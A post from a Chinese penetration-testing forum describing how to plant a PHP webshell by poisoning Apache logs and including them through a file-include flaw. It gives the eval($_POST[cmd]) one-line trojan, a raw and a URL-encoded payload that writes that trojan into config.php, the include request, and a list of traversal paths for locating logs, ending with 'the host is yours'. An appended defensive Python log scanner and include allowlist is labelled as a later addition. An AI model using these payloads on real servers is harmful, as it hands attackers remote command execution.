中国网络渗透测试联盟

Title: Writing a webshell via PHP include of Apache logs

Author: admin    Time: 2012-9-15 14:27
Title: Writing a webshell via PHP include of Apache logs
Because the method above is quite impractical (in my testing the log was routinely tens of megabytes, which makes it no fun to play with), the next step is to think a bit further: we write in a real, usable webshell, which is also much better than the painfully slow approach above.

For example, take the same one-line trojan:
<?eval($_POST[cmd]);?>

By now you may already have thought of it: this is a pretty good method. Read on; how to write it in becomes the question. Use this statement:
Use fopen to open the file /home/virtual/www.xxx.com/forum/config.php, then write the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Joined together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?>   // writes the one-line trojan statement into config.php

We submit this and let Apache record it in the error log; including the log then writes the shell successfully. Remember it must be converted to URL-encoded form or it will not work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

That way the error log records this line of webshell-writing code.
Then we include the log, submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell has been written successfully, and config.php now contains the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Just connect to it with lanker's client and the host is yours.

PS: Everything above presupposes that the directory permissions are writable; it has to be -rwxrwxrwx (777) to proceed, which you check directly on the directory listed above. All of the above is exploitation in the case where the log path is known.

For other log paths, you can guess, or refer to the list here.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
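The defender's side of the post above, as an added example that is not part of the original post and not the forum's or author's code. It covers the two points the post relies on: the poisoning request leaves PHP code in the access log (percent-encoded) and in the error log (decoded, in a "File does not exist" message), so a log scanner can flag it; and the include wrapper (the post's z.php?zizzy= parameter) must never accept an arbitrary path, so an allowlist plus a base-directory check is shown as a Python model of the validation a PHP include() front-end should perform. All log lines, paths, and the parameter names are constructed for the example.

```python
"""Detect log-poisoning attempts and refuse log-file includes.

Two pieces, both written from the defender's side:
 1. scan_log(lines): flags Apache log entries whose request (raw or
    percent-encoded) carries a PHP open tag or an execution/file builtin,
    or that asks an include parameter for a web-server log file.
 2. resolve_include(base_dir, user_value, allowed): the check an include
    wrapper such as z.php?zizzy= should make before calling include().
"""
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample log lines (not taken from any real server).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [15/Sep/2012:14:27:01 +0800] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [15/Sep/2012:14:27:03 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22x%22'
    '%2C%22w%2B%22%29%3B%3F%3E HTTP/1.1" 404 209',
    '10.0.0.9 - - [15/Sep/2012:14:27:05 +0800] "GET /z.php?zizzy=../../../../var/log/'
    'httpd/error_log HTTP/1.1" 200 0',
]
SAMPLE_ERROR_LOG = [
    '[Sat Sep 15 14:27:03 2012] [error] [client 10.0.0.9] File does not exist: '
    '/var/www/html/<?$fp=fopen("x","w+");?>',
]

# A PHP open tag (but not an XML declaration) has no business in a request path.
PHP_TAG_RE = re.compile(r"<\?(?!xml\b)")
# Builtins a poisoning payload needs to execute or to drop a file.
PHP_FUNC_RE = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|fopen|fputs|fwrite|"
    r"file_put_contents)\s*\(",
    re.IGNORECASE,
)
# Request that points an include parameter at a typical Apache log location.
LOG_TARGET_RE = re.compile(
    r"(?:\.\./|/)(?:var/log|var/www/logs|usr/local/apache/logs|etc/httpd/logs|apache/logs)/",
    re.IGNORECASE,
)


def fully_decode(text: str) -> str:
    """Percent-decode until stable: access_log keeps the raw %XX form, error_log
    holds it decoded once, and a double-encoded payload would survive one pass."""
    for _ in range(3):
        nxt = unquote(text)
        if nxt == text:
            break
        text = nxt
    return text


def is_poisoning_attempt(line: str) -> bool:
    """True if the decoded line contains a PHP tag or a payload-style builtin call."""
    decoded = fully_decode(line)
    return bool(PHP_TAG_RE.search(decoded) or PHP_FUNC_RE.search(decoded))


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_index, reason) for every suspicious entry."""
    hits = []
    for i, line in enumerate(lines):
        if is_poisoning_attempt(line):
            hits.append((i, "php-code-in-request"))
        elif LOG_TARGET_RE.search(fully_decode(line)):
            hits.append((i, "log-file-requested"))
    return hits


def resolve_include(base_dir: str, user_value: str, allowed: frozenset) -> Optional[str]:
    """Return the absolute path an include wrapper may load, or None to refuse.

    The request value must be one of a fixed set of names (so traversal strings
    and absolute paths such as the post's log list never match), and the
    resolved file must still lie under base_dir as a second line of defence.
    """
    if user_value not in allowed:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for name, lines in (("access_log", SAMPLE_ACCESS_LOG), ("error_log", SAMPLE_ERROR_LOG)):
        for idx, reason in scan_log(lines):
            print(f"{name}:{idx}: {reason}: {lines[idx]}")
    print(resolve_include("/srv/app/inc", "header.php", frozenset({"header.php"})))
    print(resolve_include("/srv/app/inc", "../../../../var/log/httpd/error_log",
                          frozenset({"header.php"})))
```

Running the block prints the two poisoned access-log entries and the error-log entry, then shows the allowlisted include resolving while the traversal value is refused. The error-log match is the important one for this technique: Apache writes the decoded path into "File does not exist", so a detector that only looks for "%3C%3F" in the access log would miss the copy that actually gets executed by the include.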

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2